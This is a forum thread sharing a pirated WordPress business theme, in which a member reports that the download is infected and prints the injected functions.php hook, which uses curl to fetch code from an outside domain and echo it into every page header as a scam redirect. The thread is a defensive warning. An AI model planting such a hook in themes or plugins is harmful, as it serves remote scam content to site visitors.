[GET] Cleanex - Minimalist Business Themeforest WordPress Theme

***magicmastermind*** · (This post was last modified: 11-13-2012 06:40 PM by magicmastermind.)

Cleanex - Minimalist Business Themeforest WordPress Theme
Cleanex is a simple, clean and minimalist business wordpress theme
suitable for company, business, portfolio and corporate sites. This
template also perfect for blog, portfolio and personal sites.

Demo:

Code:

themeforest.net/item/cleanex-minimalist-business-wordpress-theme/1029018

Download:

Magic Button :

***simey69*** · 11-13-2012, 11:53 PM

THE ABOVE FILE IS INFECTED

It contains a wp_head infection

I'm unable to clean and share it now due to time, but will do later
If you need it now, please remove the following code from functions.php near the end of file.

Code:

<?php

function jqueryj_head() {

if(function_exists('curl_init'))

{

$url = "http://www.shigg.com/soft/jquery-1.6.3.min.js";

$ch = curl_init();

$timeout = 10;

curl_setopt($ch,CURLOPT_URL,$url);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);

$data = curl_exec($ch);

curl_close($ch);

echo "$data";

}

}

add_action('wp_head', 'jqueryj_head');

?>

cheers,
Si

***vietguysvn*** · (This post was last modified: 11-14-2012 12:30 AM by vietguysvn.)

Hi, simey69. that code is only in functions.php file.
Simple thing is removed it, and will be ok to use, right ??? Or still have something more important, so you can't reupload cleaned version.

***simey69*** · 11-14-2012, 12:40 AM

Hi,

Yeah, just remove the bit above and you're clean and safe to use.

Cheers,
Si

***phinuss*** · 11-17-2012, 06:44 AM

(11-13-2012 11:53 PM)simey69 Wrote:
THE ABOVE FILE IS INFECTED

It contains a wp_head infection

I'm unable to clean and share it now due to time, but will do later
If you need it now, please remove the following code from functions.php near the end of file.

Code:

function jqueryj_head() { if(function_exists('curl_init')) { $url = "/soft/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 10; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; } } add_action('wp_head', 'jqueryj_head'); ?>

cheers,
Si

thanks for your report
but i need question, ho do you cek this?? are u use anti virus??
i have 30 theme n i need cek every theme from infection

thanks b4

***simey69*** · 11-17-2012, 07:05 PM

Hi,

I check them manually, but hope to release a scanner soon

Cheers,
Si

***magicmastermind*** · 11-17-2012, 09:01 PM

Why would that be an infection ? It is the original code from the developer and it does not harm your server in any way does it ?

***simey69*** · (This post was last modified: 11-17-2012 10:41 PM by simey69.)

no, it's not the original code.

the file was tampered with on 13/11/12 at 08:44 according to the archive dates.

The above code was added to pull offsite code from the domain shigg com
this will end up as some crappy cpa scam

After a quick look at this one, it ends up leading to a bit ly link, pointing to a cpahits page

I've cleaned hundreds of these S***** script kiddy scams, including 4 of your recent shares.
this host domain is also common amongst these infections.

it's not aimed to hurt your server, as it delivers code into the page delivered to the viewer.

as of now, it's had over 7k hits in the last 7 days, check it's stats here:

Code:

bitly -dot- com/U6Jsq2+

***magicmastermind*** · 11-19-2012, 01:00 AM

hm okay, so im sorry for that one! i pulled the scripts from another board and thought it was the original code!
thank you for the analysis!

***simey69*** · 11-19-2012, 03:33 AM

Hi,

No worries, it's easily done - they're written to be spread that way, avoid virus scan detection and look innocent.

Cheers,
Si